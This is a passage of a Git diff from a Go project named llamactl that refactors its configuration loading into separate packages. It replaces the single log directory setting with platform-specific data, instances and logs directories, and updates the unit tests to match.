if opts.Model != "/path/model.gguf" {
|
if opts.Model != "/path/model.gguf" {
|
||||||
return fmt.Errorf("expected model '/path/model.gguf', got %q", opts.Model)
|
return fmt.Errorf("expected model '/path/model.gguf', got %q", opts.Model)
|
||||||
}
|
}
|
||||||
@@ -316,7 +315,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
|||||||
{
|
{
|
||||||
name: "temperature alternatives",
|
name: "temperature alternatives",
|
||||||
jsonData: `{"temp": 0.8}`,
|
jsonData: `{"temp": 0.8}`,
|
||||||
checkFn: func(opts llamactl.LlamaServerOptions) error {
|
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
||||||
if opts.Temperature != 0.8 {
|
if opts.Temperature != 0.8 {
|
||||||
return fmt.Errorf("expected temperature 0.8, got %f", opts.Temperature)
|
return fmt.Errorf("expected temperature 0.8, got %f", opts.Temperature)
|
||||||
}
|
}
|
||||||
@@ -327,7 +326,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
|||||||
|
|
||||||
for _, tt := range tests {
|
for _, tt := range tests {
|
||||||
t.Run(tt.name, func(t *testing.T) {
|
t.Run(tt.name, func(t *testing.T) {
|
||||||
var options llamactl.LlamaServerOptions
|
var options llamacpp.LlamaServerOptions
|
||||||
err := json.Unmarshal([]byte(tt.jsonData), &options)
|
err := json.Unmarshal([]byte(tt.jsonData), &options)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("Unmarshal failed: %v", err)
|
t.Fatalf("Unmarshal failed: %v", err)
|
||||||
@@ -343,7 +342,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
|||||||
func TestUnmarshalJSON_InvalidJSON(t *testing.T) {
|
func TestUnmarshalJSON_InvalidJSON(t *testing.T) {
|
||||||
invalidJSON := `{"port": "not-a-number", "invalid": syntax}`
|
invalidJSON := `{"port": "not-a-number", "invalid": syntax}`
|
||||||
|
|
||||||
var options llamactl.LlamaServerOptions
|
var options llamacpp.LlamaServerOptions
|
||||||
err := json.Unmarshal([]byte(invalidJSON), &options)
|
err := json.Unmarshal([]byte(invalidJSON), &options)
|
||||||
if err == nil {
|
if err == nil {
|
||||||
t.Error("Expected error for invalid JSON")
|
t.Error("Expected error for invalid JSON")
|
||||||
@@ -357,7 +356,7 @@ func TestUnmarshalJSON_ArrayFields(t *testing.T) {
|
|||||||
"dry_sequence_breaker": [".", "!", "?"]
|
"dry_sequence_breaker": [".", "!", "?"]
|
||||||
}`
|
}`
|
||||||
|
|
||||||
var options llamactl.LlamaServerOptions
|
var options llamacpp.LlamaServerOptions
|
||||||
err := json.Unmarshal([]byte(jsonData), &options)
|
err := json.Unmarshal([]byte(jsonData), &options)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("Unmarshal failed: %v", err)
|
t.Fatalf("Unmarshal failed: %v", err)
|
||||||
@@ -1,4 +1,4 @@
|
|||||||
package llamactl
|
package config
|
||||||
|
|
||||||
import (
|
import (
|
||||||
"os"
|
"os"
|
||||||
@@ -10,8 +10,8 @@ import (
|
|||||||
"gopkg.in/yaml.v3"
|
"gopkg.in/yaml.v3"
|
||||||
)
|
)
|
||||||
|
|
||||||
// Config represents the configuration for llamactl
|
// AppConfig represents the configuration for llamactl
|
||||||
type Config struct {
|
type AppConfig struct {
|
||||||
Server ServerConfig `yaml:"server"`
|
Server ServerConfig `yaml:"server"`
|
||||||
Instances InstancesConfig `yaml:"instances"`
|
Instances InstancesConfig `yaml:"instances"`
|
||||||
Auth AuthConfig `yaml:"auth"`
|
Auth AuthConfig `yaml:"auth"`
|
||||||
@@ -37,8 +37,17 @@ type InstancesConfig struct {
|
|||||||
// Port range for instances (e.g., 8000,9000)
|
// Port range for instances (e.g., 8000,9000)
|
||||||
PortRange [2]int `yaml:"port_range"`
|
PortRange [2]int `yaml:"port_range"`
|
||||||
|
|
||||||
// Directory where instance logs will be stored
|
// Directory where all llamactl data will be stored (instances.json, logs, etc.)
|
||||||
LogDirectory string `yaml:"log_directory"`
|
DataDir string `yaml:"data_dir"`
|
||||||
|
|
||||||
|
// Instance config directory override
|
||||||
|
InstancesDir string `yaml:"configs_dir"`
|
||||||
|
|
||||||
|
// Logs directory override
|
||||||
|
LogsDir string `yaml:"logs_dir"`
|
||||||
|
|
||||||
|
// Automatically create the data directory if it doesn't exist
|
||||||
|
AutoCreateDirs bool `yaml:"auto_create_dirs"`
|
||||||
|
|
||||||
// Maximum number of instances that can be created
|
// Maximum number of instances that can be created
|
||||||
MaxInstances int `yaml:"max_instances"`
|
MaxInstances int `yaml:"max_instances"`
|
||||||
@@ -76,9 +85,9 @@ type AuthConfig struct {
|
|||||||
// 1. Hardcoded defaults
|
// 1. Hardcoded defaults
|
||||||
// 2. Config file
|
// 2. Config file
|
||||||
// 3. Environment variables
|
// 3. Environment variables
|
||||||
func LoadConfig(configPath string) (Config, error) {
|
func LoadConfig(configPath string) (AppConfig, error) {
|
||||||
// 1. Start with defaults
|
// 1. Start with defaults
|
||||||
cfg := Config{
|
cfg := AppConfig{
|
||||||
Server: ServerConfig{
|
Server: ServerConfig{
|
||||||
Host: "0.0.0.0",
|
Host: "0.0.0.0",
|
||||||
Port: 8080,
|
Port: 8080,
|
||||||
@@ -87,7 +96,10 @@ func LoadConfig(configPath string) (Config, error) {
|
|||||||
},
|
},
|
||||||
Instances: InstancesConfig{
|
Instances: InstancesConfig{
|
||||||
PortRange: [2]int{8000, 9000},
|
PortRange: [2]int{8000, 9000},
|
||||||
LogDirectory: "/tmp/llamactl",
|
DataDir: getDefaultDataDirectory(),
|
||||||
|
InstancesDir: filepath.Join(getDefaultDataDirectory(), "instances"),
|
||||||
|
LogsDir: filepath.Join(getDefaultDataDirectory(), "logs"),
|
||||||
|
AutoCreateDirs: true,
|
||||||
MaxInstances: -1, // -1 means unlimited
|
MaxInstances: -1, // -1 means unlimited
|
||||||
LlamaExecutable: "llama-server",
|
LlamaExecutable: "llama-server",
|
||||||
DefaultAutoRestart: true,
|
DefaultAutoRestart: true,
|
||||||
@@ -114,7 +126,7 @@ func LoadConfig(configPath string) (Config, error) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// loadConfigFile attempts to load config from file with fallback locations
|
// loadConfigFile attempts to load config from file with fallback locations
|
||||||
func loadConfigFile(cfg *Config, configPath string) error {
|
func loadConfigFile(cfg *AppConfig, configPath string) error {
|
||||||
var configLocations []string
|
var configLocations []string
|
||||||
|
|
||||||
// If specific config path provided, use only that
|
// If specific config path provided, use only that
|
||||||
@@ -138,7 +150,7 @@ func loadConfigFile(cfg *Config, configPath string) error {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// loadEnvVars overrides config with environment variables
|
// loadEnvVars overrides config with environment variables
|
||||||
func loadEnvVars(cfg *Config) {
|
func loadEnvVars(cfg *AppConfig) {
|
||||||
// Server config
|
// Server config
|
||||||
if host := os.Getenv("LLAMACTL_HOST"); host != "" {
|
if host := os.Getenv("LLAMACTL_HOST"); host != "" {
|
||||||
cfg.Server.Host = host
|
cfg.Server.Host = host
|
||||||
@@ -157,15 +169,28 @@ func loadEnvVars(cfg *Config) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// Data config
|
||||||
|
if dataDir := os.Getenv("LLAMACTL_DATA_DIRECTORY"); dataDir != "" {
|
||||||
|
cfg.Instances.DataDir = dataDir
|
||||||
|
}
|
||||||
|
if instancesDir := os.Getenv("LLAMACTL_INSTANCES_DIR"); instancesDir != "" {
|
||||||
|
cfg.Instances.InstancesDir = instancesDir
|
||||||
|
}
|
||||||
|
if logsDir := os.Getenv("LLAMACTL_LOGS_DIR"); logsDir != "" {
|
||||||
|
cfg.Instances.LogsDir = logsDir
|
||||||
|
}
|
||||||
|
if autoCreate := os.Getenv("LLAMACTL_AUTO_CREATE_DATA_DIR"); autoCreate != "" {
|
||||||
|
if b, err := strconv.ParseBool(autoCreate); err == nil {
|
||||||
|
cfg.Instances.AutoCreateDirs = b
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
// Instance config
|
// Instance config
|
||||||
if portRange := os.Getenv("LLAMACTL_INSTANCE_PORT_RANGE"); portRange != "" {
|
if portRange := os.Getenv("LLAMACTL_INSTANCE_PORT_RANGE"); portRange != "" {
|
||||||
if ports := ParsePortRange(portRange); ports != [2]int{0, 0} {
|
if ports := ParsePortRange(portRange); ports != [2]int{0, 0} {
|
||||||
cfg.Instances.PortRange = ports
|
cfg.Instances.PortRange = ports
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
if logDir := os.Getenv("LLAMACTL_LOG_DIR"); logDir != "" {
|
|
||||||
cfg.Instances.LogDirectory = logDir
|
|
||||||
}
|
|
||||||
if maxInstances := os.Getenv("LLAMACTL_MAX_INSTANCES"); maxInstances != "" {
|
if maxInstances := os.Getenv("LLAMACTL_MAX_INSTANCES"); maxInstances != "" {
|
||||||
if m, err := strconv.Atoi(maxInstances); err == nil {
|
if m, err := strconv.Atoi(maxInstances); err == nil {
|
||||||
cfg.Instances.MaxInstances = m
|
cfg.Instances.MaxInstances = m
|
||||||
@@ -231,64 +256,63 @@ func ParsePortRange(s string) [2]int {
|
|||||||
return [2]int{0, 0} // Invalid format
|
return [2]int{0, 0} // Invalid format
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// getDefaultDataDirectory returns platform-specific default data directory
|
||||||
|
func getDefaultDataDirectory() string {
|
||||||
|
switch runtime.GOOS {
|
||||||
|
case "windows":
|
||||||
|
// Try PROGRAMDATA first (system-wide), fallback to LOCALAPPDATA (user)
|
||||||
|
if programData := os.Getenv("PROGRAMDATA"); programData != "" {
|
||||||
|
return filepath.Join(programData, "llamactl")
|
||||||
|
}
|
||||||
|
if localAppData := os.Getenv("LOCALAPPDATA"); localAppData != "" {
|
||||||
|
return filepath.Join(localAppData, "llamactl")
|
||||||
|
}
|
||||||
|
return "C:\\ProgramData\\llamactl" // Final fallback
|
||||||
|
|
||||||
|
case "darwin":
|
||||||
|
// For macOS, use user's Application Support directory
|
||||||
|
if homeDir, _ := os.UserHomeDir(); homeDir != "" {
|
||||||
|
return filepath.Join(homeDir, "Library", "Application Support", "llamactl")
|
||||||
|
}
|
||||||
|
return "/usr/local/var/llamactl" // Fallback
|
||||||
|
|
||||||
|
default:
|
||||||
|
// Linux and other Unix-like systems
|
||||||
|
if homeDir, _ := os.UserHomeDir(); homeDir != "" {
|
||||||
|
return filepath.Join(homeDir, ".local", "share", "llamactl")
|
||||||
|
}
|
||||||
|
return "/var/lib/llamactl" // Final fallback
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
// getDefaultConfigLocations returns platform-specific config file locations
|
// getDefaultConfigLocations returns platform-specific config file locations
|
||||||
func getDefaultConfigLocations() []string {
|
func getDefaultConfigLocations() []string {
|
||||||
var locations []string
|
var locations []string
|
||||||
|
|
||||||
// Current directory (cross-platform)
|
|
||||||
locations = append(locations,
|
|
||||||
"./llamactl.yaml",
|
|
||||||
"./config.yaml",
|
|
||||||
)
|
|
||||||
|
|
||||||
homeDir, _ := os.UserHomeDir()
|
homeDir, _ := os.UserHomeDir()
|
||||||
|
|
||||||
switch runtime.GOOS {
|
switch runtime.GOOS {
|
||||||
case "windows":
|
case "windows":
|
||||||
// Windows: Use APPDATA and ProgramData
|
// Windows: Use APPDATA if available, else user home, fallback to ProgramData
|
||||||
if appData := os.Getenv("APPDATA"); appData != "" {
|
if appData := os.Getenv("APPDATA"); appData != "" {
|
||||||
locations = append(locations, filepath.Join(appData, "llamactl", "config.yaml"))
|
locations = append(locations, filepath.Join(appData, "llamactl", "config.yaml"))
|
||||||
}
|
} else if homeDir != "" {
|
||||||
if programData := os.Getenv("PROGRAMDATA"); programData != "" {
|
|
||||||
locations = append(locations, filepath.Join(programData, "llamactl", "config.yaml"))
|
|
||||||
}
|
|
||||||
// Fallback to user home
|
|
||||||
if homeDir != "" {
|
|
||||||
locations = append(locations, filepath.Join(homeDir, "llamactl", "config.yaml"))
|
locations = append(locations, filepath.Join(homeDir, "llamactl", "config.yaml"))
|
||||||
}
|
}
|
||||||
|
locations = append(locations, filepath.Join(os.Getenv("PROGRAMDATA"), "llamactl", "config.yaml"))
|
||||||
|
|
||||||
case "darwin":
|
case "darwin":
|
||||||
// macOS: Use proper Application Support directories
|
// macOS: Use Application Support in user home, fallback to /Library/Application Support
|
||||||
if homeDir != "" {
|
if homeDir != "" {
|
||||||
locations = append(locations,
|
locations = append(locations, filepath.Join(homeDir, "Library", "Application Support", "llamactl", "config.yaml"))
|
||||||
filepath.Join(homeDir, "Library", "Application Support", "llamactl", "config.yaml"),
|
|
||||||
filepath.Join(homeDir, ".config", "llamactl", "config.yaml"), // XDG fallback
|
|
||||||
)
|
|
||||||
}
|
}
|
||||||
locations = append(locations, "/Library/Application Support/llamactl/config.yaml")
|
locations = append(locations, "/Library/Application Support/llamactl/config.yaml")
|
||||||
locations = append(locations, "/etc/llamactl/config.yaml") // Unix fallback
|
|
||||||
|
|
||||||
default:
|
default:
|
||||||
// User config: $XDG_CONFIG_HOME/llamactl/config.yaml or ~/.config/llamactl/config.yaml
|
// Linux/Unix: Use ~/.config/llamactl/config.yaml, fallback to /etc/llamactl/config.yaml
|
||||||
configHome := os.Getenv("XDG_CONFIG_HOME")
|
if homeDir != "" {
|
||||||
if configHome == "" && homeDir != "" {
|
locations = append(locations, filepath.Join(homeDir, ".config", "llamactl", "config.yaml"))
|
||||||
configHome = filepath.Join(homeDir, ".config")
|
|
||||||
}
|
}
|
||||||
if configHome != "" {
|
|
||||||
locations = append(locations, filepath.Join(configHome, "llamactl", "config.yaml"))
|
|
||||||
}
|
|
||||||
|
|
||||||
// System config: /etc/llamactl/config.yaml
|
|
||||||
locations = append(locations, "/etc/llamactl/config.yaml")
|
locations = append(locations, "/etc/llamactl/config.yaml")
|
||||||
|
|
||||||
// Additional system locations
|
|
||||||
if xdgConfigDirs := os.Getenv("XDG_CONFIG_DIRS"); xdgConfigDirs != "" {
|
|
||||||
for dir := range strings.SplitSeq(xdgConfigDirs, ":") {
|
|
||||||
if dir != "" {
|
|
||||||
locations = append(locations, filepath.Join(dir, "llamactl", "config.yaml"))
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
|
|
||||||
return locations
|
return locations
|
||||||
@@ -1,16 +1,15 @@
|
|||||||
package llamactl_test
|
package config_test
|
||||||
|
|
||||||
import (
|
import (
|
||||||
|
"llamactl/pkg/config"
|
||||||
"os"
|
"os"
|
||||||
"path/filepath"
|
"path/filepath"
|
||||||
"testing"
|
"testing"
|
||||||
|
|
||||||
llamactl "llamactl/pkg"
|
|
||||||
)
|
)
|
||||||
|
|
||||||
func TestLoadConfig_Defaults(t *testing.T) {
|
func TestLoadConfig_Defaults(t *testing.T) {
|
||||||
// Test loading config when no file exists and no env vars set
|
// Test loading config when no file exists and no env vars set
|
||||||
cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
|
cfg, err := config.LoadConfig("nonexistent-file.yaml")
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("LoadConfig should not error with defaults: %v", err)
|
t.Fatalf("LoadConfig should not error with defaults: %v", err)
|
||||||
}
|
}
|
||||||
@@ -22,12 +21,24 @@ func TestLoadConfig_Defaults(t *testing.T) {
|
|||||||
if cfg.Server.Port != 8080 {
|
if cfg.Server.Port != 8080 {
|
||||||
t.Errorf("Expected default port to be 8080, got %d", cfg.Server.Port)
|
t.Errorf("Expected default port to be 8080, got %d", cfg.Server.Port)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
homedir, err := os.UserHomeDir()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("Failed to get user home directory: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
if cfg.Instances.InstancesDir != filepath.Join(homedir, ".local", "share", "llamactl", "instances") {
|
||||||
|
t.Errorf("Expected default instances directory '%s', got %q", filepath.Join(homedir, ".local", "share", "llamactl", "instances"), cfg.Instances.InstancesDir)
|
||||||
|
}
|
||||||
|
if cfg.Instances.LogsDir != filepath.Join(homedir, ".local", "share", "llamactl", "logs") {
|
||||||
|
t.Errorf("Expected default logs directory '%s', got %q", filepath.Join(homedir, ".local", "share", "llamactl", "logs"), cfg.Instances.LogsDir)
|
||||||
|
}
|
||||||
|
if !cfg.Instances.AutoCreateDirs {
|
||||||
|
t.Error("Expected default instances auto-create to be true")
|
||||||
|
}
|
||||||
if cfg.Instances.PortRange != [2]int{8000, 9000} {
|
if cfg.Instances.PortRange != [2]int{8000, 9000} {
|
||||||
t.Errorf("Expected default port range [8000, 9000], got %v", cfg.Instances.PortRange)
|
t.Errorf("Expected default port range [8000, 9000], got %v", cfg.Instances.PortRange)
|
||||||
}
|
}
|
||||||
if cfg.Instances.LogDirectory != "/tmp/llamactl" {
|
|
||||||
t.Errorf("Expected default log directory '/tmp/llamactl', got %q", cfg.Instances.LogDirectory)
|
|
||||||
}
|
|
||||||
if cfg.Instances.MaxInstances != -1 {
|
if cfg.Instances.MaxInstances != -1 {
|
||||||
t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances)
|
t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances)
|
||||||
}
|
}
|
||||||
@@ -56,7 +67,7 @@ server:
|
|||||||
port: 9090
|
port: 9090
|
||||||
instances:
|
instances:
|
||||||
port_range: [7000, 8000]
|
port_range: [7000, 8000]
|
||||||
log_directory: "/custom/logs"
|
logs_dir: "/custom/logs"
|
||||||
max_instances: 5
|
max_instances: 5
|
||||||
llama_executable: "/usr/bin/llama-server"
|
llama_executable: "/usr/bin/llama-server"
|
||||||
default_auto_restart: false
|
default_auto_restart: false
|
||||||
@@ -69,7 +80,7 @@ instances:
|
|||||||
t.Fatalf("Failed to write test config file: %v", err)
|
t.Fatalf("Failed to write test config file: %v", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
cfg, err := llamactl.LoadConfig(configFile)
|
cfg, err := config.LoadConfig(configFile)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("LoadConfig failed: %v", err)
|
t.Fatalf("LoadConfig failed: %v", err)
|
||||||
}
|
}
|
||||||
@@ -84,8 +95,8 @@ instances:
|
|||||||
if cfg.Instances.PortRange != [2]int{7000, 8000} {
|
if cfg.Instances.PortRange != [2]int{7000, 8000} {
|
||||||
t.Errorf("Expected port range [7000, 8000], got %v", cfg.Instances.PortRange)
|
t.Errorf("Expected port range [7000, 8000], got %v", cfg.Instances.PortRange)
|
||||||
}
|
}
|
||||||
if cfg.Instances.LogDirectory != "/custom/logs" {
|
if cfg.Instances.LogsDir != "/custom/logs" {
|
||||||
t.Errorf("Expected log directory '/custom/logs', got %q", cfg.Instances.LogDirectory)
|
t.Errorf("Expected logs directory '/custom/logs', got %q", cfg.Instances.LogsDir)
|
||||||
}
|
}
|
||||||
if cfg.Instances.MaxInstances != 5 {
|
if cfg.Instances.MaxInstances != 5 {
|
||||||
t.Errorf("Expected max instances 5, got %d", cfg.Instances.MaxInstances)
|
t.Errorf("Expected max instances 5, got %d", cfg.Instances.MaxInstances)
|
||||||
@@ -110,7 +121,7 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
|
|||||||
"LLAMACTL_HOST": "0.0.0.0",
|
"LLAMACTL_HOST": "0.0.0.0",
|
||||||
"LLAMACTL_PORT": "3000",
|
"LLAMACTL_PORT": "3000",
|
||||||
"LLAMACTL_INSTANCE_PORT_RANGE": "5000-6000",
|
"LLAMACTL_INSTANCE_PORT_RANGE": "5000-6000",
|
||||||
"LLAMACTL_LOG_DIR": "/env/logs",
|
"LLAMACTL_LOGS_DIR": "/env/logs",
|
||||||
"LLAMACTL_MAX_INSTANCES": "20",
|
"LLAMACTL_MAX_INSTANCES": "20",
|
||||||
"LLAMACTL_LLAMA_EXECUTABLE": "/env/llama-server",
|
"LLAMACTL_LLAMA_EXECUTABLE": "/env/llama-server",
|
||||||
"LLAMACTL_DEFAULT_AUTO_RESTART": "false",
|
"LLAMACTL_DEFAULT_AUTO_RESTART": "false",
|
||||||
@@ -124,7 +135,7 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
|
|||||||
defer os.Unsetenv(key)
|
defer os.Unsetenv(key)
|
||||||
}
|
}
|
||||||
|
|
||||||
cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
|
cfg, err := config.LoadConfig("nonexistent-file.yaml")
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("LoadConfig failed: %v", err)
|
t.Fatalf("LoadConfig failed: %v", err)
|
||||||
}
|
}
|
||||||
@@ -139,8 +150,8 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
|
|||||||
if cfg.Instances.PortRange != [2]int{5000, 6000} {
|
if cfg.Instances.PortRange != [2]int{5000, 6000} {
|
||||||
t.Errorf("Expected port range [5000, 6000], got %v", cfg.Instances.PortRange)
|
t.Errorf("Expected port range [5000, 6000], got %v", cfg.Instances.PortRange)
|
||||||
}
|
}
|
||||||
if cfg.Instances.LogDirectory != "/env/logs" {
|
if cfg.Instances.LogsDir != "/env/logs" {
|
||||||
t.Errorf("Expected log directory '/env/logs', got %q", cfg.Instances.LogDirectory)
|
t.Errorf("Expected logs directory '/env/logs', got %q", cfg.Instances.LogsDir)
|
||||||
}
|
}
|
||||||
if cfg.Instances.MaxInstances != 20 {
|
if cfg.Instances.MaxInstances != 20 {
|
||||||
t.Errorf("Expected max instances 20, got %d", cfg.Instances.MaxInstances)
|
t.Errorf("Expected max instances 20, got %d", cfg.Instances.MaxInstances)
|
||||||
@@ -183,7 +194,7 @@ instances:
|
|||||||
defer os.Unsetenv("LLAMACTL_HOST")
|
defer os.Unsetenv("LLAMACTL_HOST")
|
||||||
defer os.Unsetenv("LLAMACTL_MAX_INSTANCES")
|
defer os.Unsetenv("LLAMACTL_MAX_INSTANCES")
|
||||||
|
|
||||||
cfg, err := llamactl.LoadConfig(configFile)
|
cfg, err := config.LoadConfig(configFile)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("LoadConfig failed: %v", err)
|
t.Fatalf("LoadConfig failed: %v", err)
|
||||||
}
|
}
|
||||||
@@ -219,7 +230,7 @@ instances:
|
|||||||
t.Fatalf("Failed to write test config file: %v", err)
|
t.Fatalf("Failed to write test config file: %v", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
_, err = llamactl.LoadConfig(configFile)
|
_, err = config.LoadConfig(configFile)
|
||||||
if err == nil {
|
if err == nil {
|
||||||
t.Error("Expected LoadConfig to return error for invalid YAML")
|
t.Error("Expected LoadConfig to return error for invalid YAML")
|
||||||
}
|
}
|
||||||
@@ -245,7 +256,7 @@ func TestParsePortRange(t *testing.T) {
|
|||||||
|
|
||||||
for _, tt := range tests {
|
for _, tt := range tests {
|
||||||
t.Run(tt.name, func(t *testing.T) {
|
t.Run(tt.name, func(t *testing.T) {
|
||||||
result := llamactl.ParsePortRange(tt.input)
|
result := config.ParsePortRange(tt.input)
|
||||||
if result != tt.expected {
|
if result != tt.expected {
|
||||||
t.Errorf("ParsePortRange(%q) = %v, expected %v", tt.input, result, tt.expected)
|
t.Errorf("ParsePortRange(%q) = %v, expected %v", tt.input, result, tt.expected)
|
||||||
}
|
}
|
||||||
@@ -260,31 +271,31 @@ func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
|
|||||||
testCases := []struct {
|
testCases := []struct {
|
||||||
envVar string
|
envVar string
|
||||||
envValue string
|
envValue string
|
||||||
checkFn func(*llamactl.Config) bool
|
checkFn func(*config.AppConfig) bool
|
||||||
desc string
|
desc string
|
||||||
}{
|
}{
|
||||||
{
|
{
|
||||||
envVar: "LLAMACTL_PORT",
|
envVar: "LLAMACTL_PORT",
|
||||||
envValue: "invalid-port",
|
envValue: "invalid-port",
|
||||||
checkFn: func(c *llamactl.Config) bool { return c.Server.Port == 8080 }, // Should keep default
|
checkFn: func(c *config.AppConfig) bool { return c.Server.Port == 8080 }, // Should keep default
|
||||||
desc: "invalid port number should keep default",
|
desc: "invalid port number should keep default",
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
envVar: "LLAMACTL_MAX_INSTANCES",
|
envVar: "LLAMACTL_MAX_INSTANCES",
|
||||||
envValue: "not-a-number",
|
envValue: "not-a-number",
|
||||||
checkFn: func(c *llamactl.Config) bool { return c.Instances.MaxInstances == -1 }, // Should keep default
|
checkFn: func(c *config.AppConfig) bool { return c.Instances.MaxInstances == -1 }, // Should keep default
|
||||||
desc: "invalid max instances should keep default",
|
desc: "invalid max instances should keep default",
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
envVar: "LLAMACTL_DEFAULT_AUTO_RESTART",
|
envVar: "LLAMACTL_DEFAULT_AUTO_RESTART",
|
||||||
envValue: "invalid-bool",
|
envValue: "invalid-bool",
|
||||||
checkFn: func(c *llamactl.Config) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default
|
checkFn: func(c *config.AppConfig) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default
|
||||||
desc: "invalid boolean should keep default",
|
desc: "invalid boolean should keep default",
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
envVar: "LLAMACTL_INSTANCE_PORT_RANGE",
|
envVar: "LLAMACTL_INSTANCE_PORT_RANGE",
|
||||||
envValue: "invalid-range",
|
envValue: "invalid-range",
|
||||||
checkFn: func(c *llamactl.Config) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default
|
checkFn: func(c *config.AppConfig) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default
|
||||||
desc: "invalid port range should keep default",
|
desc: "invalid port range should keep default",
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
@@ -294,7 +305,7 @@ func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
|
|||||||
os.Setenv(tc.envVar, tc.envValue)
|
os.Setenv(tc.envVar, tc.envValue)
|
||||||
defer os.Unsetenv(tc.envVar)
|
defer os.Unsetenv(tc.envVar)
|
||||||
|
|
||||||
cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
|
cfg, err := config.LoadConfig("nonexistent-file.yaml")
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("LoadConfig failed: %v", err)
|
t.Fatalf("LoadConfig failed: %v", err)
|
||||||
}
|
}
|
||||||
@@ -323,7 +334,7 @@ server:
|
|||||||
t.Fatalf("Failed to write test config file: %v", err)
|
t.Fatalf("Failed to write test config file: %v", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
cfg, err := llamactl.LoadConfig(configFile)
|
cfg, err := config.LoadConfig(configFile)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("LoadConfig failed: %v", err)
|
t.Fatalf("LoadConfig failed: %v", err)
|
||||||
}
|
}
|
||||||
@@ -1,10 +1,12 @@
|
|||||||
package llamactl
|
package instance
|
||||||
|
|
||||||
import (
|
import (
|
||||||
"context"
|
"context"
|
||||||
"encoding/json"
|
"encoding/json"
|
||||||
"fmt"
|
"fmt"
|
||||||
"io"
|
"io"
|
||||||
|
"llamactl/pkg/backends/llamacpp"
|
||||||
|
"llamactl/pkg/config"
|
||||||
"log"
|
"log"
|
||||||
"net/http"
|
"net/http"
|
||||||
"net/http/httputil"
|
"net/http/httputil"
|
||||||
@@ -21,7 +23,7 @@ type CreateInstanceOptions struct {
|
|||||||
// RestartDelay duration in seconds
|
// RestartDelay duration in seconds
|
||||||
RestartDelay *int `json:"restart_delay_seconds,omitempty"`
|
RestartDelay *int `json:"restart_delay_seconds,omitempty"`
|
||||||
|
|
||||||
LlamaServerOptions `json:",inline"`
|
llamacpp.LlamaServerOptions `json:",inline"`
|
||||||
}
|
}
|
||||||
|
|
||||||
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
|
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
|
||||||
@@ -53,11 +55,11 @@ func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
|
|||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
// Instance represents a running instance of the llama server
|
// Process represents a running instance of the llama server
|
||||||
type Instance struct {
|
type Process struct {
|
||||||
Name string `json:"name"`
|
Name string `json:"name"`
|
||||||
options *CreateInstanceOptions `json:"-"`
|
options *CreateInstanceOptions `json:"-"`
|
||||||
globalSettings *InstancesConfig
|
globalSettings *config.InstancesConfig
|
||||||
|
|
||||||
// Status
|
// Status
|
||||||
Running bool `json:"running"`
|
Running bool `json:"running"`
|
||||||
@@ -121,7 +123,7 @@ func validateAndCopyOptions(name string, options *CreateInstanceOptions) *Create
|
|||||||
}
|
}
|
||||||
|
|
||||||
// applyDefaultOptions applies default values from global settings to any nil options
|
// applyDefaultOptions applies default values from global settings to any nil options
|
||||||
func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *InstancesConfig) {
|
func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *config.InstancesConfig) {
|
||||||
if globalSettings == nil {
|
if globalSettings == nil {
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
@@ -143,15 +145,15 @@ func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *Instanc
|
|||||||
}
|
}
|
||||||
|
|
||||||
// NewInstance creates a new instance with the given name, log path, and options
|
// NewInstance creates a new instance with the given name, log path, and options
|
||||||
func NewInstance(name string, globalSettings *InstancesConfig, options *CreateInstanceOptions) *Instance {
|
func NewInstance(name string, globalSettings *config.InstancesConfig, options *CreateInstanceOptions) *Process {
|
||||||
// Validate and copy options
|
// Validate and copy options
|
||||||
